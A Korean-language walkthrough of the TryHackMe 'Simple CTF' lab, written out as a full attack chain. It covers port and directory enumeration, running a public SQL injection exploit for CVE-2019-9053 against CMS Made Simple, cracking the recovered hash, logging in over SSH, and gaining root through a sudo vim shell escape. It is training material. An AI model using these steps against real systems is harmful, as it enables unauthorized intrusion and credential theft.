
전문적인 TryHackMe Simple CTF 워크스루: 열거, CMS Made Simple SQL Injection (CVE-2019-9053), 자격 증명 복구, SSH 액세스, Vim을 통한 권한 상승, 루트 장악을 다룹니다.
전문 TryHackMe Simple CTF 워크스루: 열거, CMS Made Simple SQL 인젝션(CVE-2019-9053), 자격 증명 복구, SSH 접속, Vim을 통한 권한 상승, 루트 장악.
TryHackMe의 Simple CTF 룸 완전 워크스루: 정찰, 열거, 익스플로잇, 자격 증명 복구, 권한 상승, 플래그 획득.
| 필드 | 값 |
|---|---|
| 플랫폼 | TryHackMe |
| 룸 이름 | Simple CTF |
| 난이도 | Easy |
| 카테고리 | 웹 익스플로잇 & Linux 권한 상승 |
| 작성자 | Saahil Gupta (ImperialX1104) |
이 룸의 목표는 다음과 같습니다:
호스트 발견
│
▼
포트 열거
│
▼
디렉터리 열거
│
▼
CMS 발견
│
▼
버전 식별
│
▼
SQL 인젝션 (CVE-2019-9053)
│
▼
자격 증명 추출
│
▼
비밀번호 크래킹
│
▼
SSH 접속
│
▼
사용자 플래그
│
▼
권한 상승
│
▼
루트 플래그
첫 단계는 대상 머신과의 연결성을 확인하는 것이었습니다.
ping 10.49.175.174
호스트가 성공적으로 응답하여 연결 가능함을 확인했습니다.

노출된 서비스를 식별하기 위해 종합적인 Nmap 스캔을 수행했습니다.
nmap -A -v 10.49.175.174
| 포트 | 서비스 | 버전 |
|---|---|---|
| 21 | FTP | vsftpd 3.0.3 |
| 80 | HTTP | Apache 2.4.18 |
| 2222 | SSH | OpenSSH 7.2p2 |

대상 웹 서버로 이동하면 기본 Apache 랜딩 페이지가 표시되었습니다.
http://10.49.175.174

이 단계에서는 눈에 띄는 공격 표면이 없었습니다.
숨겨진 리소스를 식별하기 위해 FFUF를 사용하여 디렉터리 무차별 대입을 수행했습니다.
ffuf -u http://10.49.175.174/FUZZ \
-w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt \
-fc 200
simple [Status: 301]

/simple 디렉터리가 발견되었습니다.
발견된 디렉터리로 이동하면 CMS 설치가 드러났습니다.
http://10.49.175.174/simple

CMS Made Simple 2.2.8
이 버전 번호는 나중에 결정적인 역할을 했습니다.
SearchSploit을 사용하여 CMS 버전을 조사했습니다.
searchsploit "CMS Made Simple"
CMS Made Simple < 2.2.10 - SQL Injection

알려진 SQL 인젝션 취약점이 식별되었습니다.
익스플로잇을 로컬로 복사하여 분석 및 실행 준비를 했습니다.
searchsploit -m 46635
CMS Made Simple < 2.2.10 - SQL Injection
CVE-2019-9053

공개된 익스플로잇을 대상 CMS 인스턴스에 대해 실행했습니다.
python3 exploit.py \
-u http://10.49.175.174/simple/ \
--crack \
-w /usr/share/wordlists/rockyou.txt
익스플로잇이 백엔드 데이터베이스에서 정보를 성공적으로 추출했습니다.
[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: [email protected]

| 항목 | 값 |
|---|---|
| 사용자명 | mitch |
| 이메일 | [email protected] |
| 솔트 | 1dac0d92e9fa6bb2 |
추출된 해시를 Hashcat을 사용하여 크래킹했습니다.
hashcat -m 20 hash.txt --show
0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
| 필드 | 값 |
|---|---|
| 사용자명 | mitch |
| 비밀번호 | secret |

복구된 자격 증명을 SSH 서비스에 대해 테스트했습니다.
ssh [email protected] -p 2222
secret
Welcome to Ubuntu 16.04.6 LTS

성공적인 인증으로 mitch 사용자로 셸 접속이 가능해졌습니다.
접속 후 Mitch의 홈 디렉터리에서 사용자 플래그를 찾았습니다.
whoami
cd ~
cat user.txt
G00d j0b, keep up!

sudo 권한을 확인하여 흥미로운 구성을 발견했습니다.
sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim

이 구성은 사용자가 비밀번호 없이 Vim을 root 권한으로 실행할 수 있게 합니다.
Vim을 root로 실행:
sudo vim
Vim이 상승된 권한으로 실행 중이므로 root 소유 파일에 접근할 수 있었습니다.

루트 플래그는 root 사용자의 디렉터리에 위치했습니다.
:! cat /root/root.txt
W3ll d0n3. You made it!

G00d j0b, keep up!
W3ll d0n3. You made it!
Nmap 스캔
↓
웹 열거
↓
디렉터리 발견 (/simple)
↓
CMS Made Simple 2.2.8
↓
SearchSploit 연구
↓
CVE-2019-9053 SQL 인젝션
↓
자격 증명 추출
↓
해시 크래킹
↓
SSH 로그인 (mitch:secret)
↓
사용자 플래그
↓
sudo -l
↓
Vim 권한 상승
↓
루트 플래그
취약한 CMS는 홈페이지에 보이지 않았고 디렉터리 열거를 통해 발견되었습니다.
정확한 CMS 버전이 알려진 취약점으로 직접 연결되었습니다.
복구된 자격 증명은 항상 모든 사용 가능한 서비스에 대해 테스트해야 합니다.
Vim과 같은 편집기를 특권 실행하도록 허용하면 전체 시스템 장악으로 이어질 수 있습니다.
이 룸은 초기 열거부터 전체 루트 장악까지 완전한 공격 체인을 시연했습니다. 웹 애플리케이션 열거, SQL 인젝션 익스플로잇, 비밀번호 크래킹, Linux 권한 상승 기법을 결합하여 대상 시스템을 완전히 제어할 수 있었습니다.
이 룸은 실제 침투 테스트 방법론에 대한 훌륭한 입문서 역할을 하며, 적절한 소프트웨어 패치, 자격 증명 보안, 최소 권한 접근 제어의 중요성을 강조합니다.
Saahil Gupta (ImperialX1104)
⭐ 이 워크스루가 유용했다면 저장소에 별표를 남기고 GitHub에서 저와 연결해 주세요.